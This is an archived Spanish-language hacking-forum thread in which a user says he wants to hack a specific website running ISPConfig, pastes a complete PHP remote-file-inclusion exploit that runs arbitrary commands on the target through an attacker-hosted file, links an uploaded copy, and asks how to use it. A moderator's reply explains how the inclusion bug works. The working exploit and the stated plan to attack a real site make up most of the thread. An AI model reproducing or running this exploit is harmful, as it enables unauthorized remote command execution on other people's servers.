elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
14 Febrero 2012, 02:33  


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Exploit ISPConfig :D
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Exploit ISPConfig :D  (Leído 1,949 veces)
Rudy21

Desconectado Desconectado

Mensajes: 149


Rudy21 Web Design


Ver Perfil WWW
Exploit ISPConfig :D
« en: 15 Junio 2006, 21:19 »

Hola

Pues miren enkontre una web que euiro hackear y tiene ISPconfig y lo que me pasa es que el login esta en HTML

intente cone l accesdrive pero el no detecta el formulario

encontre un Exploit de RFI (remote File Intrusion) y este es e el code

Código:
<?php
/*
ISPConfig Remote File Inclusion Exploit c0ded by ReZEN
Sh0uts: xorcrew.net, ajax, gml, #subterrain, My gf
url:  http://www.xorcrew.net/ReZEN

example:
turl:
http://www.target.com/lib/session.inc.php?go_info[server][classes_root]=
hurl: http://www.pwn3d.com/evil.txt?

*/

$cmd = $_POST["cmd"];
$turl = $_POST["turl"];
$hurl = $_POST["hurl"];

$form= "<form method=\"post\" action=\"".$PHP_SELF."\">"
     ."turl:<br><input type=\"text\" name=\"turl\" size=\"90\"
value=\"".$turl."\"><br>"
     ."hurl:<br><input type=\"text\" name=\"hurl\" size=\"90\"
value=\"".$hurl."\"><br>"
     ."cmd:<br><input type=\"text\" name=\"cmd\" size=\"90\"
value=\"".$cmd."\"><br>"
     ."<input type=\"submit\" value=\"Submit\" name=\"submit\">"
     ."</form><HR WIDTH=\"650\" ALIGN=\"LEFT\">";

if (!isset($_POST['submit']))
{

echo $form;

}else{

$file = fopen ("test.txt", "w+");

fwrite($file, "<?php system(\"echo ++BEGIN++\"); system(\"".$cmd."\");
system(\"echo ++END++\"); ?>");
fclose($file);

$file = fopen ($turl.$hurl, "r");
if (!$file) {
     echo "<p>Unable to get output.\n";
     exit;
}

echo $form;

while (!feof ($file)) {
     $line .= fgets ($file, 1024)."<br>";
     }
$tpos1 = strpos($line, "++BEGIN++");
$tpos2 = strpos($line, "++END++");
$tpos1 = $tpos1+strlen("++BEGIN++");
$tpos2 = $tpos2-$tpos1;
$output = substr($line, $tpos1, $tpos2);
echo $output;

}
?>

ya el exploit esta subido aca

http://shell.fileplace.biz/xploit1.php

talvez lo marken como SPAM ! xD

pero bueno

el Exploit dice esto

Citar

entonces la web a hackear es vamos a ponerla como XXXXX.org.mxlib/session.inc.php?go_info[server][classes_root]=

Pero qeu es "[server] y [classes_root]="

Despues hurl seria la Shell no?

y al ultimo en el fomr html dle exploit sale tmb CMD que serian los comandos o como??


salu2 y gracias, espro sua yuda lo mas pronto posible
En línea


sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.946


Lavando Platos


Ver Perfil WWW
Re: Exploit ISPConfig :D
« Respuesta #1 en: 16 Junio 2006, 00:14 »

Este bug necesita de tener el valor: registerglobals en off
[server][classes_root] es un valor al que se le hace:

include
o
require

en fin, lo que hace este bug es que:

guarda el comando a ejecutar en el archivo test.txt
despues incluye este archivo con RFI en el otro host
y obtiene lo que responde, y te lo muestra.

Invetiga sobre RFI y lee un poco sobre PHP, y si puedes consigue el codigo fuente del script vulnerable, para que lo entiendas mejor.

Saludos!!
« Última modificación: 17 Junio 2006, 04:47 por Sdc » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines